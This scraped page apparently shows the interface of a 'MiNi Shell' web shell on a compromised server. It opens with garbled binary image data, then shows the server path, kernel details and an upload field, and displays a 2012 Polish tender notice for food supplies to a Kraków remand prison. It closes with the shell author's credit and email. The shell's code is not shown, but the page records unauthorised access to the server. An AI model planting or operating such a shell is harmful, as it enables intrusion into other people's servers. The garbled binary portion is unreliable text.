JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120319/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120319/63065-N-2012.html

<p class="kh_header"><b>Kraków: Dostawy artykułów spożywczych do Aresztu Śledczego 
w Krakowie  Podgórzu, ul. Czarnieckiego 3</b><br>
<b>Numer ogłoszenia: 63065 - 2012; data zamieszczenia: 19.03.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Areszt Śledczy w Krakowie Podgórzu , ul. Stefana Czarnieckiego 3, 30-536 Kraków, woj. małopolskie, tel. 12 620 50 00, faks 12 4235771.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.sw.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Organ kontroli państwowej lub ochrony prawa, sąd lub trybunał.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawy artykułów spożywczych do Aresztu Śledczego 
w Krakowie  Podgórzu, ul. Czarnieckiego 3.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia w prowadzonym postępowaniu jest:

Grupa I - Produkty ogólnospożywcze
1. Cynamon mielony				kg	   12
2. Gałka muszkatołowa	mielona	             	kg	     3 
3. Herbata granulowana			kg          280
4. Herbata ekspresowa	`a 2g			szt     10 000 - ilość torebek do zaparzania          
5. Ketchup pikantny lub łagodny			kg	  600 - opakowanie jednostkowe `a 5 kg
6. Kminek					kg 	    20
            7.Kwasek cytrynowy				kg	    20
            8.Liść laurowy					kg	    24
            9.Majeranek					kg	    15
           10.Majonez					kg	   200 - opakowanie jedn. `a 5 kg
           11.Musztarda					kg	   600 - opakowanie jedn. `a 5 kg
           12.Ocet spirytusowy 10%			l	    90 - opakowanie jedn. `a 0,5 l
           13.Papryka mielona słodka			kg	    24
           14.Pieprz  naturalny mielony	                       kg          160
           15.Przyprawa do potraw w płynie		kg	1 680 - opakowanie jedn. `a 1000 g
           16.Sól jodowana			        	kg	2 000 - opakowanie jedn. `a 1000 g
           17.Przyprawa typu VEGETA			kg	  160
           18.Ziele angielskie				kg	    24
           19.Żurek w płynie	      			l	  300
           20.Zupy typu gorący kubek			szt       1 200
           21.Czosnek granulowany			kg            12
           22.Miód sztuczny				kg	  600
           23.Syrop do napojów				l 	1 000 - opakowanie jedn. `a 5l
           24.Proszek do pieczenia 			kg             5
           25.Cukier wanilinowy 				kg             5
           26.Woda mineralna gazowana/niegazowana 	l          3 000 - opakowanie jedn. `a 1,5 l
               27.Woda mineralna wysokozmineralizowana	l          2 000 - opakowanie jedn. `a 1,5 l
                gazowana lub niegazowana

            Grupa II  - Cukier
1.Cukier kryształ (luz)				kg       3 400
            2.Cukier porcje `a 5g				kg	   50 

             Grupa III - Produkty zbożowe
             1.Kasza jęczmienna (luz)			kg       1 000
            2.Płatki owsiane (luz)				kg	   10
            3.Kasza manna (luz)				kg	  720
            4.Mąka pszenna (luz)				kg       3 600
            5.Ryż długoziarnisty (luz)			kg       2 400
            6.Makaron -  nitki lub galanteria (luz)		kg       2 500

            Grupa IV - Przetwory owocowo - warzywne
           1.Groszek konserwowy				kg	  480
           2.Leczo pieczarkowe				kg       1 100
           3.Fasolka konserwowa				kg	  380
           4.Dżemy (wiśniowy,truskawkowy,brzoskwiniowy) kg     3 000 - opakowanie jedn. 5, 10 lub 15 kg
           5.Dżemy porcjowane 25g (smaki jw.)		kg	  140
           6.Marmolada wieloowocowa	  		kg          800 - opakowanie jedn. 5, 10 lub 15 kg
           7.Powidła śliwkowe				kg          800 - opakowanie jedn. 5, 10 lub 15 kg
           8.Chrzan tarty					kg	  260 - opakowanie jedn.  1 kg
           9.Koncentrat pomidorowy 30%			kg	1200 - opakowanie jedn.   1 lub 3 kg
          10.Kotlety sojowe				kg	  300
          11.Pasztety sojowe `a 80g lub 100g		kg	  160.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 15.87.20.00-1, 15.86.30.00-5, 15.86.41.00-3, 15.87.12.30-5, 15.89.10.00-0, 15.87.11.10-8, 15.87.21.00-2, 15.87.24.00-5, 15.83.16.00-8, 15.83.15.00-7, 15.98.10.00-8, 15.83.12.00-4, 15.85.11.00-9, 15.61.33.00-1, 15.61.41.00-6, 15.61.21.00-2, 15.89.00.00-3, 15.33.22.96-5, 15.33.14.25-2, 15.33.22.90-3, 15.33.22.30-5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 24.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunku będzie dokonana w oparciu o złożone oświadczenie. Zamawiający uzna, że wykonawca spełnił warunek, jeżeli wykonawca dostarczy w/w oświadczenie w którym potwierdzi spełnienie w/w warunku.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunku będzie dokonana w oparciu o złożone oświadczenie. Zamawiający uzna, że wykonawca spełnił warunek, jeżeli wykonawca dostarczy w/w oświadczenie w którym potwierdzi spełnienie w/w warunku.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunku będzie dokonana w oparciu o złożone oświadczenie. Zamawiający uzna, że wykonawca spełnił warunek, jeżeli wykonawca dostarczy w/w oświadczenie w którym potwierdzi spełnienie w/w warunku.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunku będzie dokonana w oparciu o złożone oświadczenie. Zamawiający uzna, że wykonawca spełnił warunek, jeżeli wykonawca dostarczy w/w oświadczenie w którym potwierdzi spełnienie w/w warunku.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunku będzie dokonana w oparciu o złożone oświadczenie. Zamawiający uzna, że wykonawca spełnił warunek, jeżeli wykonawca dostarczy w/w oświadczenie w którym potwierdzi spełnienie w/w warunku.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
</li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - Ilość dni utrzymania ceny ofertowej (nie więcej niż 730 dni) - 10</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.sw.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Areszt Śledczy w Krakowie Podgórzu, ul. Czarnieckiego 3, 30-536 Kraków.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 29.03.2012 godzina 14:00, miejsce: Areszt Śledczy w Krakowie Podgórzu, ul. Czarnieckiego 3, 30-536 Kraków.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> do 27.04.2012.</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Produkty ogólnospożywcze.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Cynamon mielony				kg	   12
2. Gałka muszkatołowa	mielona	             	kg	     3 
3. Herbata granulowana			kg          280
4. Herbata ekspresowa	`a 2g			szt     10 000 - ilość torebek do zaparzania          
5. Ketchup pikantny lub łagodny			kg	  600 - opakowanie jednostkowe `a 5 kg
6. Kminek					kg 	    20
            7.Kwasek cytrynowy				kg	    20
            8.Liść laurowy					kg	    24
            9.Majeranek					kg	    15
           10.Majonez					kg	   200 - opakowanie jedn. `a 5 kg
           11.Musztarda					kg	   600 - opakowanie jedn. `a 5 kg
           12.Ocet spirytusowy 10%			l	    90 - opakowanie jedn. `a 0,5 l
           13.Papryka mielona słodka			kg	    24
           14.Pieprz  naturalny mielony	                       kg          160
           15.Przyprawa do potraw w płynie		kg	1 680 - opakowanie jedn. `a 1000 g
           16.Sól jodowana			        	kg	2 000 - opakowanie jedn. `a 1000 g
           17.Przyprawa typu VEGETA			kg	  160
           18.Ziele angielskie				kg	    24
           19.Żurek w płynie	      			l	  300
           20.Zupy typu gorący kubek			szt       1 200
           21.Czosnek granulowany			kg            12
           22.Miód sztuczny				kg	  600
           23.Syrop do napojów				l 	1 000 - opakowanie jedn. `a 5l
           24.Proszek do pieczenia 			kg             5
           25.Cukier wanilinowy 				kg             5
           26.Woda mineralna gazowana lub niegazowana 	l          3 000 - opakowanie jedn. `a 1,5 l
               27.Woda mineralna wysokozmineralizowana	l          2 000 - opakowanie jedn. `a 1,5 l
                gazowana lub niegazowana.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.87.20.00-1, 15.86.30.00-5, 15.86.41.00-3, 15.87.12.30-5, 15.89.10.00-0, 15.87.21.00-2, 15.87.24.00-5, 15.83.16.00-8, 15.83.15.00-7, 15.98.10.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Ilość dni utrzymania ceny ofertowej (nie więcej niż 730 dni) - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Cukier.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Cukier kryształ (luz)				kg       3 400
            2.Cukier porcje `a 5g				kg	   50.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.83.12.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Ilość dni utrzymania ceny ofertowej (nie więcej niż 730 dni) - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Produkty zbożowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Kasza jęczmienna (luz)			kg       1 000
            2.Płatki owsiane (luz)				kg	   10
            3.Kasza manna (luz)				kg	  720
            4.Mąka pszenna (luz)				kg       3 600
            5.Ryż długoziarnisty (luz)			kg       2 400
            6.Makaron -  nitki lub galanteria (luz)		kg       2 500.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.85.11.00-9, 15.61.33.00-1, 15.61.41.00-6, 15.61.21.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Ilość dni utrzymania ceny ofertowej (nie więcej niż 730 dni) - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Przetwory owocowo - warzywne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Groszek konserwowy				kg	  480
           2.Leczo pieczarkowe				kg       1 100
           3.Fasolka konserwowa				kg	  380
           4.Dżemy (wiśniowy,truskawkowy,brzoskwiniowy) kg     3 000 - opakowanie jedn. 5, 10 lub 15 kg
           5.Dżemy porcjowane 25g (smaki jw.)		kg	  140
           6.Marmolada wieloowocowa	  		kg          800 - opakowanie jedn. 5, 10 lub 15 kg
           7.Powidła śliwkowe				kg          800 - opakowanie jedn. 5, 10 lub 15 kg
           8.Chrzan tarty					kg	  260 - opakowanie jedn.  1 kg
           9.Koncentrat pomidorowy 30%			kg	1200 - opakowanie jedn.   1 lub 3 kg
          10.Kotlety sojowe				kg	  300
          11.Pasztety sojowe `a 80g lub 100g		kg	  160.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.89.00.00-3, 15.33.22.96-5, 15.33.22.94-1, 15.33.22.90-3, 15.33.22.30-5, 15.33.14.00-1, 15.33.14.25-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Ilość dni utrzymania ceny ofertowej (nie więcej niż 730 dni) - 10</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com